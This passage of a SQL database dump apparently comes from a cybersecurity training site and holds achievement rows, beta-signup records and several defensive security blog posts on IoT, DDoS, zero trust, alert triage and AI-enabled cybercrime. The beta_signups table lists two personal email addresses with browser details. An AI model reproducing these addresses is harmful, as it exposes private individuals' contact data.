(10, 'Day Walker', 'Completed an investigation during typical business hours (9 AM - 5 PM).', NULL, 'special', '{\"time_range\": \"day_walker\"}', 50, '2026-01-13 18:37:35'),
(11, 'Lunch Break Hacker', 'Completed an investigation during lunch hour (12 PM - 1 PM).', NULL, 'special', '{\"time_range\": \"lunch_break\"}', 75, '2026-01-13 18:37:35'),
(12, 'Speed Demon', 'Solved an investigation in under 10 minutes.', NULL, 'special', '{\"performance\": \"speed_demon\", \"threshold_minutes\": 10}', 200, '2026-01-13 18:37:35'),
(13, 'First Blood', 'First user to solve a specific alert.', NULL, 'special', '{\"performance\": \"first_blood\"}', 500, '2026-01-13 18:37:35');

-- --------------------------------------------------------

--
-- Table structure for table `beta_signups`
--

CREATE TABLE `beta_signups` (
  `id` int(11) NOT NULL,
  `email` varchar(255) NOT NULL,
  `ip_address` varchar(45) DEFAULT NULL,
  `user_agent` text DEFAULT NULL,
  `source` varchar(50) DEFAULT 'web',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `beta_signups`
--

INSERT INTO `beta_signups` (`id`, `email`, `ip_address`, `user_agent`, `source`, `created_at`) VALUES
(2, 'tommyaipsd@gmail.com', '127.0.0.1', 'Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Mobile/15E148 Safari/604.1', 'web', '2026-02-07 01:17:43'),
(3, 'ravisb6143@gmail.com', '127.0.0.1', 'Mozilla/5.0 (iPhone; CPU iPhone OS 26_2_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/144.0.7559.95 Mobile/15E148 Safari/604.1', 'web', '2026-02-08 17:07:55');

-- --------------------------------------------------------

--
-- Table structure for table `blog_posts`
--

CREATE TABLE `blog_posts` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `slug` varchar(255) NOT NULL,
  `content` longtext DEFAULT NULL,
  `excerpt` text DEFAULT NULL,
  `featured_image` varchar(1024) DEFAULT NULL,
  `featured_image_alt` varchar(255) DEFAULT NULL,
  `author_id` int(11) DEFAULT NULL,
  `status` enum('published','draft') DEFAULT 'draft',
  `created_at` datetime DEFAULT current_timestamp(),
  `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `category` varchar(100) DEFAULT NULL,
  `seo_title` varchar(255) DEFAULT NULL,
  `seo_description` text DEFAULT NULL,
  `focus_keyword` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `blog_posts`
--

INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(1, 'IoT and the Modern Home: How to Stay Safe in a Connected World', 'iot-and-the-modern-home-how-to-stay-safe-in-a-connected-world', '# The Reality of the Connected Home\n\nThe connected home is no longer a futuristic concept—it\'s a reality. From smart locks and thermostats to cameras and refrigerators, the Internet of Things (IoT) has transformed how we live, work, and interact with our environment. However, behind this convenience lies a growing threat: every connected device is a potential entry point for cyberattacks.\n\nToday\'s smart homeowner isn\'t just managing gadgets—they\'re managing risk. Understanding these risks is the first step toward securing what matters most.\n\n## The Rise (and Risk) of the Smart Home\n\nSmart homes promise simplicity: lights that learn daily routines, security systems that respond automatically, and voice assistants that anticipate needs. But the same connections that make life easier can also open digital doors to intruders.\n\nStudies show that up to 80% of consumer IoT devices contain known vulnerabilities, and attacks targeting smart homes increased by more than 100% year over year in 2024. Mass adoption has moved faster than security awareness and regulation.\n\n### Why IoT Devices Are So Vulnerable\n\nMost IoT devices are designed for affordability and convenience, not security. Common issues include default credentials, unpatched firmware, weak or missing encryption, and the lack of unified security standards.\n\nEven basic devices like smart plugs, TVs, and routers can become the weakest link. Once compromised, attackers can move laterally and gain control of the entire home network.\n\n### Real-World Threats from Compromised Devices\n\nSmart home breaches are real and damaging. Hackers have hijacked cameras and baby monitors, exposed private routines through energy data, recruited devices into botnets like Mirai, and permanently disabled hardware through malicious firmware.\n\nEvery connected device can act as both a helper and a hazard.\n\n## Convenience vs. Security\n\nMost users assume smart devices are secure by default, yet the majority report low confidence in IoT security. While many say they would pay more for safer devices, manufacturers still prioritize features and speed to market over security by design.\n\nAs a result, responsibility often falls on users who are least equipped to manage complex security risks.\n\n## How to Secure Your Smart Home\n\nSecuring a smart home does not require expert knowledge. Key steps include:\n\n- Changing default passwords\n- Keeping firmware updated\n- Segmenting IoT devices on separate networks\n- Using WPA3 encryption\n- Enabling multi-factor authentication\n- Choosing reputable manufacturers\n- Limiting unnecessary permissions\n\nSmall, consistent actions significantly reduce risk.\n\n## The Future of Smart Home Security\n\nAI-driven anomaly detection, zero-trust models, blockchain-based authentication, and quantum-resistant encryption are shaping the future of IoT security. Regulatory efforts like the EU Cyber Resilience Act, UK PSTI Act, and U.S. Cyber Trust Mark are improving accountability, while standards such as Matter and ETSI EN 303 645 aim to unify security practices.\n\nStill, education and awareness remain the strongest defense.\n\n## Security Is the True Smart Choice\n\nA connected home can be both convenient and secure, but only with intentional choices. From password hygiene to device selection, every decision impacts safety.\n\nSmart homes represent progress—but without cybersecurity awareness, progress quickly becomes exposure. Protecting your IoT ecosystem ensures your home remains smart in every sense of the word.', '', 'http://infoseclabs.io/uploads/1767472026759-342558123.jpeg', NULL, 1, 'published', '2026-01-03 07:21:00', '2026-01-03 23:27:20', 'IoT Security', 'Securing Your Connected Home: Risks & Solutions', 'Explore the risks of IoT in smart homes and learn effective measures to enhance your home\'s security.', 'smart home security'),
(2, 'Understanding DDoS Attacks: Protecting Your Digital Infrastructure', 'understanding-ddos-attacks-protecting-your-digital-infrastructure', '# Understanding Distributed Denial-of-Service (DDoS) Attacks\n\nDistributed Denial-of-Service (DDoS) attacks are among the most severe threats in today’s digital landscape. They can cripple businesses, disrupt critical infrastructure, and prevent users from accessing essential online services. Understanding how these attacks work, the tools attackers use, and how to mitigate them is essential for protecting digital assets.\n\nThis article explains the fundamentals of DDoS attacks, common attack types, attacker tools, and effective mitigation strategies. By the end, you will be able to recognize, respond to, and reduce the impact of DDoS attacks.\n\n## Introduction to DDoS Attacks\n\nA Distributed Denial-of-Service (DDoS) attack overwhelms a target, such as a website, server, or network, with massive traffic. This disrupts normal operations and makes services unavailable to legitimate users.\n\n## Types of DDoS Attacks\n\n### Volumetric Attacks\n\nThese attacks consume bandwidth by flooding the network with large volumes of traffic, blocking legitimate access.\n\n### Protocol Attacks\n\nThese exploit weaknesses in network protocols such as TCP or SYN to exhaust server resources.\n\n### Application Layer Attacks\n\nThese target specific applications or services, overwhelming them with requests until they fail.\n\n## Impact of DDoS Attacks\n\nDDoS attacks can cause revenue loss, reputational damage, reduced user trust, and regulatory penalties. In 2020, AWS mitigated a record-breaking 2.3 Tbps DDoS attack, demonstrating the scale these attacks can reach.\n\n## Common DDoS Attack Methods\n\n### Volumetric Attacks\n\nExamples include UDP floods and DNS amplification attacks that generate massive traffic.\n\n### Protocol Attacks\n\nAttacks such as SYN floods and Ping of Death exploit protocol behavior to crash systems.\n\n### Application Layer Attacks\n\nAlso known as Layer 7 attacks, these include HTTP GET and POST floods targeting web services.\n\n## Tools Used in DDoS Attacks\n\n### Botnets\n\nNetworks of compromised devices controlled by attackers to generate large-scale traffic.\n\n### Stresser Services\n\nPaid services that allow users to launch DDoS attacks under the guise of stress testing.\n\n### Reflection Techniques\n\nAttackers use third-party servers to amplify traffic toward the victim.\n\n## Recognizing a DDoS Attack\n\nEarly detection reduces damage.\n\n### Common Symptoms\n\n- Slow or unavailable websites or services\n- Sudden traffic spikes from unusual locations\n- High network latency\n\n### Detection Methods\n\n- Traffic analysis\n- AI-based anomaly detection\n- Server log analysis\n\n## DDoS Mitigation Strategies\n\nAlthough prevention is difficult, the impact can be reduced.\n\n### Prevention Measures\n\n- Firewalls and intrusion prevention systems\n- Load balancers\n- Content delivery networks (CDNs)\n\n### Traffic Shaping\n\nPrioritizes legitimate traffic over malicious requests.\n\n## Real-World DDoS Case Studies\n\n### GitHub (2018)\n\nA 1.35 Tbps memcached amplification attack mitigated within minutes.\n\n### Dyn DNS (2016)\n\nA Mirai botnet attack disrupted major platforms such as Twitter and Netflix.\n\n### AWS (2020)\n\nA 2.3 Tbps attack highlighted the need for advanced mitigation systems.\n\n## Future Trends in DDoS Attacks\n\n### Increased IoT Exploitation\n\nMore vulnerable devices will expand botnet size.\n\n### AI-Driven Attacks\n\nAI may enable more adaptive and stealthy DDoS techniques.\n\n### Ransom DDoS (RDoS)\n\nAttackers demand payment to stop ongoing attacks.\n\n## Strengthen Your Security Today\n\nDDoS attacks continue to evolve and affect organizations of all sizes. By understanding attack methods, recognizing warning signs, and applying strong mitigation strategies, organizations can significantly reduce their exposure and impact.', '', 'http://infoseclabs.io/uploads/1767474329590-745685715.jpg', NULL, 1, 'published', '2026-01-03 16:01:00', '2026-01-04 00:05:43', 'Information Security', 'Understanding DDoS Attacks & Mitigation', 'Learn about DDoS attacks, methods, tools, and effective strategies to protect your digital assets from one of the biggest online threats.', 'DDoS Attacks'),
(3, 'Exploring Zero Trust: Why \'Trust but Verify\' is No Longer Enough', 'exploring-zero-trust-why-trust-but-verify-is-no-longer-enough', '# Understanding Zero Trust Architecture\n\nCybersecurity threats are becoming more sophisticated, and traditional perimeter-based security models are no longer sufficient. Zero Trust Architecture assumes that breaches can happen at any time and requires continuous verification. This shift has changed how organizations protect their digital assets.\n\nThis article explains Zero Trust Architecture, its core principles, implementation levels, and practical tools. It also uses the \"Security Onion\" analogy to simplify the concept.\n\n## Introduction to Zero Trust Architecture\n\nZero Trust is a security model where no user, device, or application is trusted by default, whether inside or outside the network. Every access request must be verified.\n\nIts importance lies in the principle of \"never trust, always verify.\" With cloud services, remote work, and mobile devices, Zero Trust provides layered protection across the entire infrastructure.\n\nTraditional models rely on a secure perimeter, granting broad access once inside. Zero Trust removes this assumption and enforces verification at every step, reducing both internal and external risks.\n\n## Core Principles of Zero Trust\n\n### Never Trust, Always Verify\n\nEvery request must be authenticated and validated before access is granted.\n\n### Least Privilege Access\n\nUsers receive only the access required to perform their tasks, minimizing exposure.\n\n### Assume Breach\n\nOrganizations operate as if a breach has already occurred, enabling continuous monitoring and rapid response.\n\n## Levels of Zero Trust Implementation\n\n### User Identity\n\nStrong identity verification using IAM solutions such as Okta or Microsoft Azure AD.\n\n### Devices and Endpoints\n\nAll devices are verified and monitored using endpoint security tools like CrowdStrike or SentinelOne.\n\n### Network\n\nMicrosegmentation limits lateral movement within the network using platforms such as Illumio or Cisco Secure Workload.\n\n### Applications\n\nApplications are protected with access controls and monitoring tools like Zscaler and Netskope.\n\n### Data\n\nData is secured through encryption, classification, and strict access controls.\n\n## Security Onion Analogy\n\nZero Trust can be visualized as layers of an onion. At the center are people, surrounded by layers including the perimeter, network, endpoints, data, and organizational policies. Each layer strengthens the next, creating a comprehensive defense model.\n\n## Tools and Technologies for Zero Trust\n\n- **Identity and Access Management (IAM)** solutions manage user identities.\n- **Multi-Factor Authentication (MFA)** strengthens authentication.\n- **Microsegmentation** limits network access.\n- **Endpoint Detection and Response (EDR)** provides visibility into device activity.\n\n## Implementing Zero Trust\n\n### Assessment\n\nIdentify assets, risks, and vulnerabilities.\n\n### Planning\n\nDefine a Zero Trust strategy and select appropriate tools.\n\n### Implementation\n\nDeploy controls gradually, starting with critical systems.\n\n### Monitoring\n\nContinuously monitor activity and automate responses.\n\n## Why Zero Trust Is the Future\n\nZero Trust Architecture is essential as cyber threats continue to evolve. It provides proactive, layered security and ensures continuous verification across all systems. Organizations that adopt Zero Trust improve resilience, reduce risk, and prepare for future challenges.', '', 'http://infoseclabs.io/uploads/1767474556038-82386573.png', NULL, 1, 'published', '2026-01-01 00:08:00', '2026-01-04 00:10:27', 'Information Security', 'Exploring Zero Trust: Secure Beyond \'Trust but Verify\'', 'Learn why Zero Trust surpasses \'Trust but Verify\' in cybersecurity, focusing on core principles and practical tools for robust security.', 'Zero Trust'),
(4, 'Overcoming Alarm Fatigue: How to Manage Security Alerts Effectively', 'overcoming-alarm-fatigue-how-to-manage-security-alerts-effectively', '# Mastering Security Alarm Management: A Guide to Effective Alert Triage\n\nWhen was the last time your security team investigated an alarm and discovered its actual cause? Security alarms are more than just annoying alerts; they are breadcrumbs along a trail left by potential attackers. Yet, too often, organizations fall prey to the \"cry wolf\" syndrome, becoming desensitized to alarms and missing signs of real danger.\n\nThe stakes couldn’t be higher. Responding to every alarm can overwhelm a team, but ignoring them completely could lead to disastrous consequences. This guide will walk you through the harsh reality of alert fatigue and provide actionable methods for effective triage to ensure you stay vigilant without drowning.\n\n## What is Alarm Fatigue?\n\nAlarm fatigue occurs when security analysts receive an overwhelming number of alarms, leading them to ignore or deprioritize notifications. When you are bombarded by 500 alerts a day, the 501st—the one that actually matters—can easily be lost in the noise.\n\n## The Harsh Reality of the SOC\n\n- **85% of security alerts are false positives**, according to research by the Ponemon Institute.\n- Analysts only investigate **56% of alerts** on average, leaving thousands of potential threats unaddressed.\n- **Burnout is real**: Over 70% of analysts with less than five years of experience face turnover risks due to the high-stress environment of unmanaged alerts.\n\n## A 5-Step Framework for Effective Alert Triage\n\nAs a new professional, you need a repeatable process. Don\'t just \"click through\" alerts—investigate them strategically.\n\n### 1. Smart Alert Grouping\n\nStop investigating alerts in isolation. Use your SIEM or SOAR to cluster related signals—such as multiple failed logins followed by a successful one from the same IP. This transforms \"noise\" into a \"story.\"\n\n### 2. Contextual Enrichment\n\nA raw alert (e.g., \"SQL Injection attempt\") is useless without context. Ask:\n\n- Is the target a critical production server or a test lab?\n- Does the server even run SQL? If not, it’s a low-priority false positive.\n- Is this the user\'s standard behavior or a sudden anomaly?\n\n### 3. Risk-Based Prioritization\n\nNot all alerts are equal. Use a scoring system that considers the criticality of the asset and the severity of the threat. Focus on level 1 (critical) threats first, and handle level 3 (low-priority) during regular business hours.\n\n### 4. Focused Investigation Path\n\nFollow defined Runbooks or Playbooks. For an authentication alert, your path should always include verifying MFA usage and checking IP reputation via tools like VirusTotal.\n\n### 5. The Feedback Loop (Tuning)\n\nThis is the most critical step for a new professional. If you identify a persistent false positive—like a nightly backup script triggering a \"mass file move\" alert—document it and work with your security engineers to tune the rule or set a suppression threshold.\n\n## Professional Advice for Your First 90 Days\n\n- **Automate the Mundane**: Use automation for repetitive tasks like IP lookups and indicator extraction so you can focus on human-centric analysis.\n- **Know Your Baseline**: You can\'t spot an outlier if you don\'t know what \"normal\" looks like in your specific network.\n- **Collaborate**: Don\'t be afraid to ask a senior analyst for a second opinion on complex alerts.\n\n## Conclusion\n\nIgnored alarms mean missed opportunities to stop an attack in its early stages. By implementing a structured triage framework and focusing on alert quality over quantity, you protect not only your organization but also your own professional longevity.', '', 'http://infoseclabs.io/uploads/1767481096256-421379954.jpg', NULL, 1, 'published', '2026-01-04 01:56:00', '2026-01-04 18:03:00', 'Information Security', 'Managing Security Alerts: Overcome Alarm Fatigue', 'Learn strategies to combat alarm fatigue and effectively manage security alerts, ensuring no threat goes undetected.', 'Alarm Fatigue'),
(5, 'Why Traditional Antivirus Falls Short in Today\'s Cybersecurity Landscape', '', '# The Evolution of Endpoint Protection: Beyond Traditional Antivirus\n\nCyberattacks are becoming increasingly sophisticated, targeting vulnerabilities with precision and speed. For years, traditional antivirus solutions have been the backbone of endpoint protection. However, as the cybersecurity landscape evolves, so do the tactics of attackers. Today, conventional antivirus software is struggling to keep pace with zero-day exploits and advanced threats. Enter Endpoint Detection and Response (EDR), the next line of defense and perhaps the future of endpoint security.\n\nIn this blog, we’ll explore why signature-based antivirus solutions fall short in combating modern threats and how EDR rises to the challenge with behavior-driven detection. By the end, you’ll understand why it may be time to upgrade your endpoint security strategy.\n\n## The Problem with Traditional Antivirus\n\nFor decades, antivirus software has relied heavily on signature-based detection. But what does that mean, and why is it no longer sufficient?\n\n### How Signature-Based Detection Works\n\nTraditional antivirus tools operate by detecting known patterns or \"signatures\" in malicious files. When a file matches a database of suspicious signatures, it gets flagged and quarantined. This strategy worked exceptionally well in an era when malware evolved slowly, and attacks were less sophisticated.\n\nHowever, modern threats have outgrown this method. Here’s why signature-based detection is falling behind:\n\n- **Zero-Day Exploits:** Cybercriminals exploit vulnerabilities that vendors are unaware of, making signature databases irrelevant in the face of these unknown threats.\n  \n- **Polymorphic Malware:** Modern malware can modify its code to avoid detection, rendering signatures ineffective.\n  \n- **Sophisticated Attacks:** Hackers now use complex, multi-vector attacks that traditional antivirus cannot analyze comprehensively.\n\nThe result? Relying purely on antivirus creates significant blind spots in your security strategy, leaving your organization vulnerable to evolving threats.', '', 'http://infoseclabs.io/uploads/1767482620674-705801876.png', NULL, 1, 'published', '2025-12-30 10:18:00', '2026-01-04 18:18:06', 'Information Security', 'Overcoming Alert Overload in Cybersecurity', 'Discover how EDR surpasses traditional antivirus in tackling modern cyber threats. Upgrade your security strategy today.', 'Endpoint Protection'),
(6, 'Elevate Your Cybersecurity Skills with Kasm Workspaces: A Comprehensive Guide', 'elevate-your-cybersecurity-skills-with-kasm-workspaces-a-comprehensive-guide', '# Kasm Workspaces for Cybersecurity Professionals\n\nThe world of cybersecurity is vast, continuously evolving, and demanding. Whether you\'re a seasoned professional or a budding enthusiast, having the right tools can be a game-changer. One such tool that\'s been making waves in the cybersecurity community is Kasm Workspaces. But what exactly is it, and how can you incorporate it into your home lab to enhance your skills and security? This blog will answer these questions and guide you through using Kasm Workspaces as a cybersecurity professional.\n\n## What is Kasm Workspaces?\n\n### Overview of Kasm Workspaces\n\nKasm Workspaces is a modern, container-based virtual desktop infrastructure (VDI) platform designed to create isolated environments for safe browsing, application deployment, remote work, and more. Unlike traditional VDIs, Kasm Workspaces utilizes lightweight containers, such as Docker, to provide scalable and secure access to virtualized environments.\n\nWhether you need to run a browser in a sandboxed environment, analyze suspicious files isolated from your main machine, or simply access a secure workspace remotely, Kasm Workspaces offers a robust and efficient solution.\n\n### Benefits for Cybersecurity Professionals\n\nFor cybersecurity professionals, Kasm Workspaces checks several critical boxes:\n\n- **Secure Environments:** Create isolated containers to analyze threats, execute potentially malicious files, or browse the web securely without risk to host machines.\n\n- **Lightweight and Scalable:** Unlike resource-heavy VMs, Kasm Workspaces\' containerized approach provides flexibility without high hardware requirements.\n\n- **Centralized Management:** Manage multiple workspaces, configurations, and users from a single dashboard effortlessly.', '', 'http://infoseclabs.io/uploads/1767482767599-980252455.png', NULL, 1, 'published', '2026-01-03 02:26:00', '2026-01-05 00:33:14', 'Projects', 'Kasm Workspaces: Setup Guide for Cybersecurity Pros', 'Discover how Kasm Workspaces enhances cybersecurity home labs with secure, scalable, containerized environments.', 'Kasm Workspaces'),
(7, 'The Rise of AI in Cybercrime: Understanding the Threats and Defenses', 'the-rise-of-ai-in-cybercrime-understanding-the-threats-and-defenses', '# The New Frontier: AI-Powered Cyberattacks\n\nThe rapid advancements in artificial intelligence (AI) have revolutionized industries by streamlining processes and creating new opportunities. However, along with its many benefits, AI has also opened a new frontier for cybercriminals. Hackers increasingly leverage machine learning and AI tools to enhance their cyberattacks, making them more sophisticated, effective, and harder to detect.\n\nThis blog delves into how AI is reshaping the cyberattack landscape, provides real-world examples, and offers actionable strategies to defend against this growing threat. If you\'re concerned about how AI is influencing cybersecurity, you\'re in the right place.\n\n## How AI Enhances Cyberattacks\n\nAI adds a dangerous layer of automation, precision, and deception to cyberattacks. Here are some ways hackers are weaponizing machine learning to exploit vulnerabilities.\n\n### Automated Vulnerability Detection\n\nHackers often need to identify weaknesses in a system to stage their attacks. Traditional methods of scanning for vulnerabilities are manual and time-consuming. However, with AI, cybercriminals can now automate this process, allowing them to find weak points in networks, software, or applications much faster.\n\nAI-powered tools analyze large datasets to identify exploitable vulnerabilities and leverage predictive analytics to determine the likelihood of specific attacks succeeding, helping hackers optimize their targets effectively.\n\nFor example, AI can detect unpatched software versions, misconfigured firewalls, or even analyze encryption keys to uncover weaknesses. This automation enables attackers to plot cyberattacks on a scale never seen before.\n\n### Advanced Phishing Campaigns\n\nPhishing, a form of cyberattack where hackers pretend to be legitimate entities to trick users into revealing sensitive information, has been around for years. However, AI has supercharged phishing schemes to become more indistinguishable from real correspondence.\n\nMachine learning enables cybercriminals to create hyper-personalized phishing messages by analyzing social media profiles, email conversations, and public records. AI can craft well-written, contextually appropriate emails that users are far more likely to click on, making these phishing attempts nearly impossible to detect using traditional filters.\n\nAccording to recent studies, 91% of all cyberattacks begin with a phishing email. Now, AI is increasing both the sophistication and authenticity of these scams, putting organizations at greater risk.\n\n### Evasive Malware and Polymorphism\n\nOne of the most dangerous aspects of AI in cyberattacks is the creation of evasive malware. AI-powered malware continuously reconfigures itself to evade detection by security software.\n\nPolymorphic malware, for instance, uses AI to generate new versions of itself with minor variations in its code. These changes render detection tools like signature-based antiviruses obsolete because they cannot recognize new iterations.\n\nWhat\'s worse, AI-powered malware can actively \"learn\" from its environment, adapting its behavior in real-time to avoid detection. It can analyze which types of actions trigger alerts and modify its activity accordingly, ensuring it stays under the radar longer.\n\n## Real-World Examples of AI-Powered Attacks\n\nAI-powered cyberattacks are no longer just hypothetical. They have already made their mark in the real world, with several alarming examples surfacing in recent years.\n\n1. **Deepfake Impersonation Scams**  \n   Hackers have used AI-generated deepfake audio to impersonate company executives. For instance, in 2019, cybercriminals used deepfake technology to mimic the voice of a CEO, convincing an employee to transfer $243,000 to a fraudulent bank account.\n\n2. **AI-Enhanced Credential Stuffing**  \n   Credential stuffing involves hackers attempting to gain access by leveraging usernames and passwords leaked from previous data breaches. AI can enhance these attacks by using machine learning to test stolen credentials across hundreds of platforms, identifying successful logins faster than human hackers could.\n\n3. **Sophisticated Chatbot Scams**  \n   Malicious chatbots powered by AI have been deployed to scam unsuspecting users. These bots can impersonate company representatives, tricking users into providing sensitive information or downloading harmful files.\n\nThese examples demonstrate the deadly potential of AI in the hands of hackers. But what can organizations do to defend themselves?\n\n## Defending Against AI Cyberattacks\n\nWhile the rise of AI-powered cyberattacks is alarming, the good news is that AI is also a powerful ally in cybersecurity. Here’s how organizations can leverage AI to stay one step ahead of attackers.\n\n### AI-Driven Threat Detection Systems\n\nSecurity systems powered by AI are vital in detecting and stopping advanced threats. These systems can process and analyze vast amounts of data in real-time, uncovering patterns or anomalies that traditional tools might miss.\n\nFor example, AI systems like CrowdStrike and Darktrace continuously monitor network traffic for suspicious activity. When a system behaves unusually, such as a sudden spike in outbound data transfers, these tools can flag it and take automated actions to mitigate threats.\n\nAdditionally, AI can provide early warnings about potential attacks by analyzing global cybersecurity trends, enabling organizations to prepare proactive defenses.\n\n### Behavioral Analysis and Anomaly Detection\n\nTraditional cybersecurity methods often rely on static rules, making them susceptible to dynamic threats like AI-powered polymorphic malware. AI solves this problem through behavioral analysis and anomaly detection.\n\nInstead of focusing only on known threat signatures, AI tools observe normal patterns of behavior within a system. Any deviation from the norm triggers alerts, even if the activity doesn’t match a known attack signature.\n\nFor example, if malware disguised as a legitimate application suddenly starts accessing sensitive files, an AI-based security system would flag this as suspicious and isolate the application before any damage is done.\n\n### Proactive Security Measures and Threat Intelligence\n\nThe key to defending against AI-powered cyberattacks is staying ahead of evolving threats. Organizations need to adopt proactive measures like penetration testing, threat simulations, and regular software updates.\n\nThreat intelligence platforms powered by AI can help businesses identify vulnerabilities before hackers do. These platforms scour the dark web, stay updated on newly discovered exploits, and provide actionable recommendations for patching weak spots.\n\nBy continuously improving their defenses and staying informed about emerging threats, businesses can significantly minimize the risks posed by AI-enhanced cyberattacks.\n\n## The Future of Cybersecurity in the Age of AI\n\nAI is rapidly transforming cybersecurity from both an offensive and defensive standpoint. While hackers will continue to exploit AI to create sophisticated cyberattacks, the same technology offers powerful solutions to thwart them.\n\nThe best way forward is for businesses and organizations to adopt AI-driven cybersecurity tools, invest in advanced threat intelligence systems, and remain vigilant in updating their defenses. When used responsibly, AI isn’t just a challenge to overcome; it’s the key to staying ahead in an increasingly complex digital world.\n\nTo safeguard your organization against AI-powered cyber threats, start exploring AI-driven cybersecurity solutions today. The future of digital safety depends on your readiness to adapt and protect.', '', 'http://infoseclabs.io/uploads/1767499156712-998648028.png', NULL, 1, 'published', '2026-01-07 02:58:00', '2026-01-07 18:18:38', 'Information Security', 'AI-Powered Cyberattacks: Hackers & Machine Learning', 'Discover how AI is transforming cyberattacks and learn strategies to protect against these sophisticated threats.', 'AI cyberattacks'),
(8, 'Security Tools vs. Manual Investigation: Building a Balanced Cybersecurity Professional', 'security-tools-vs-manual-investigation-building-a-balanced-cybersecurity-professional', '# Balancing Tools and Manual Skills in Cybersecurity\n\nCybersecurity is one of the most dynamic fields in the modern workforce, where threats evolve as quickly as the technology designed to counter them. This creates a significant challenge for cybersecurity professionals to continuously refine their skills and adapt to new methodologies. A long-standing debate in the field centers around whether professionals should focus on mastering security tools or prioritize honing their manual investigation skills.\n\nThe truth is, to become a well-rounded cybersecurity professional, it\'s not about choosing between the two but striking the right balance. This blog will explore the strengths and limitations of relying on tools, the irreplaceable value of manual investigation, and how blending these approaches can prepare you to thrive in this fast-paced field.\n\n## The Role of Security Tools in Cybersecurity\n\nSecurity tools are indispensable for automating complex tasks, ensuring faster detection and response, and providing organizations with a robust line of defense. Today\'s advanced tools have revolutionized cybersecurity by adding scalability, speed, and near real-time insights.\n\n### Key Tools Empowering Cybersecurity Professionals\n\n1. **Security Information and Event Management (SIEM):** SIEM tools such as Splunk and IBM QRadar analyze logs and events across an organization\'s IT environment, providing centralized visibility over network activity.\n2. **Intrusion Detection and Prevention Systems (IDS/IPS):** Tools like Snort and Suricata scan for suspicious traffic patterns to prevent network intrusions.\n3. **Vulnerability Scanners:** Solutions like Nessus and Rapid7 Nexpose identify weak points in your network that attackers might exploit.\n4. **Endpoint Detection and Response (EDR):** Tools like CrowdStrike and SentinelOne monitor endpoint behavior to detect anomalies and prevent breaches.\n\n### Benefits of Security Tools\n\nSecurity tools bring speed and efficiency to tasks that would take hours or even days if performed manually. They excel at:\n\n- **Threat Detection:** Automating the detection of malware or unusual activity, greatly reducing response times.\n- **Log Management:** Consolidating log data from multiple sources for easier monitoring.\n- **Reducing Errors:** Tools minimize human errors by providing consistent, algorithm-based processes.\n- **Scalability:** Tools handle large datasets and adapt to growing organizations with minimal additional labor.\n\nHowever, as powerful as these tools are, their limitations mean they can\'t be the sole focus for cybersecurity professionals.\n\n## The Importance of Manual Investigation Skills\n\nSecurity tools cannot replace the expertise, critical thinking, and intuition of a human investigator. Their reliance on predefined rules and algorithms makes them vulnerable to bypasses, misconfiguration, or outright failures.\n\n### Core Manual Investigation Techniques\n\n1. **Log Analysis:** Reviewing raw data from logs can uncover nuanced patterns and anomalies that automated tools may miss.\n2. **Network Traffic Analysis:** Manually inspecting network packets with tools like Wireshark helps you understand intricate details about suspicious traffic.\n3. **Malware Analysis:** Analyzing malicious files through static and dynamic means (e.g., decompiling code or sandbox testing) can help determine their capabilities and origins.\n4. **Behavioral Analysis:** Looking for deviations from expected behavior within user or system interactions often requires human insight.\n\n### Why Manual Skills Matter\n\n- **Complex Threats:** Cyberattacks are becoming increasingly sophisticated, and manual analysis is often required to understand advanced tactics, techniques, and procedures (TTPs).\n- **False Positives:** Over-reliance on tools can lead to missed legitimate activity being misclassified as malicious or vice versa. Human judgment is vital for distinguishing between the two.\n- **Incident Response:** When tools fail or are rendered inoperable by attackers, skilled cybersecurity professionals step in to contain, investigate, and resolve issues.\n\nBy investing in manual skills, professionals not only enhance their problem-solving capabilities but also ensure that their expertise remains irreplaceable.\n\n## Striking a Balance Between Tools and Manual Expertise\n\nThe ultimate goal for cybersecurity professionals is not about choosing one approach over the other but knowing when and how to combine both effectively. Here\'s why a blended approach works best:\n\n- **Efficiency with Tools:** Tools save time by automating repetitive tasks, letting professionals focus their manual expertise on more intricate issues.\n- **Human Judgment as a Safety Net:** Professionals must validate and interpret the data generated by tools to avoid decision-making based on incomplete or misleading information.\n- **Incident Adaptability:** While tools operate by predefined rules, humans can creatively adapt to situations.\n\nBy using security tools as extensions of their own ability—not replacements for it—professionals can maximize their impact.\n\n## Incident Response Scenario\n\nImagine this scenario: Your Security Information and Event Management (SIEM) system, which usually alerts your team of potential intrusions, has failed due to a technical error. At the same time, one of your endpoints begins acting suspiciously, potentially signaling a breach. What do you do?\n\n**Step 1 – Activate the Incident Response Plan:**\n\nInitiate the pre-established incident response plan (IRP). Begin by identifying the team members who need to be involved and delegating tasks to ensure a structured approach.\n\n**Step 2 – Collect Logs and Evidence:**\n\nSince the SIEM system is down, manually retrieve event logs from key systems (e.g., network firewalls, servers, and endpoint devices). Verify any discrepancies or unusual activity.\n\n**Step 3 – Conduct a Manual Investigation:**\n\nUse tools like Wireshark to manually analyze network traffic from suspicious endpoints. Perform behavioral analysis to identify patterns of attack.\n\n**Step 4 – Contain and Mitigate:**\n\nIsolate impacted systems from your network to prevent escalation. Apply containment measures, such as endpoint quarantine or restricting user permissions.\n\n**Step 5 – Eradication and Recovery:**\n\nRemove the threat manually by using advanced techniques like malware removal tools or system rollbacks. Restore all systems to their functional state and monitor them for lingering threats.\n\nThis scenario highlights how security tools provide convenience but how manual investigation remains critical when tools fail.\n\n## Best Practices for Professional Development\n\nTo become an effective cybersecurity professional capable of balancing tools and manual skills, consider the following:\n\n- **Certifications and Training:**', '', 'http://infoseclabs.io/uploads/1767499299723-760685997.png', NULL, 1, 'published', '2026-01-09 03:01:00', '2026-01-13 01:08:54', 'Information Security', 'Security Tools vs. Manual Skills: Cybersecurity Balance', 'Discover how to balance security tools and manual investigation skills for a comprehensive 